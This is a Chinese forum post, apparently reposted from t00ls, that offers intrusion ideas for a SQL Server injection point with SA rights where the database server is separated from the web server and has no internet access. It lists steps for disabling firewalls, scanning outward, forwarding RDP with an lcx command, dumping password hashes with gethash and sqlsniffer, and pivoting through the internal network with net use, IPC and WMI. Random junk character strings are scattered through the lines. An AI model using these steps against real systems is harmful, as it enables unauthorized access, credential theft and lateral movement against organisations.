当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
* F& P% H* R4 C
- \) G, l5 Y. c0 d+ }% C$ s" W) S$ Q3 ^# G
q% V; F, U: y |8 J9 p
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)- {# {1 ~) \# U
. M0 _3 w/ p6 @9 s# Y( x2 {
0 L& l1 J/ s' x# {, h. B一、DB机有公网IP.
) b8 @& J! Q% b) T- f
) R _( p6 x4 |' q; w1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
" ]0 C7 s6 a( V3 e6 D: [0 k' {; F8 I. |, j
5 t: E f# d4 y3 q$ y6 _2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.7 @ Y! ?( u2 \' \5 C+ G3 V8 t2 A& I
% k4 N0 C( E e, h6 M8 u }& G
* J ~) s- @5 R9 ~6 D j* n3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
+ ]* e8 G) [4 W4 K# }- W6 ]5 n. z' z ~" A4 p" ~
3 G2 S5 [2 v. ?+ r) t6 q$ ^- ]; W4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.( o1 Z% x2 b% z; ~+ O) ^# ~& c0 e
; z& F) v- y" y- l3 j, }
1 r q- I) U6 Q+ Q" e1 Z5 L/ K0 D! @' b- r- G- o1 ^
二、DB机只有内网IP* C9 m- V0 Z- v& k! F6 E2 S
9 I* m, L2 M# [# B/ H# i! k
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.' j- C2 U. p/ d w/ i$ [7 Y
9 A( v- b, M U+ {
$ S# x( Y$ H2 x' d; H2:停掉防火墙和IP策略再从内往外扫描.
6 O9 `: @0 m$ r9 r/ G
" r) G) o/ D, Q4 \. d& K# [
4 b. K/ _( _7 h: G3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.# u e/ v0 o0 o1 K6 x
5 O7 k; E: U) M( y: y* o* O7 W
4:学会密码规律分析往往会有惊喜.5 Q9 ~, C8 _8 a2 [! v
, s" T7 i* K" x- p4 ~) Z0 r4 P+ s: v- c
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
' \, u$ i2 y* O
# \9 f6 a! ?" D4 S' `
& o3 v! r9 B$ a' [有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |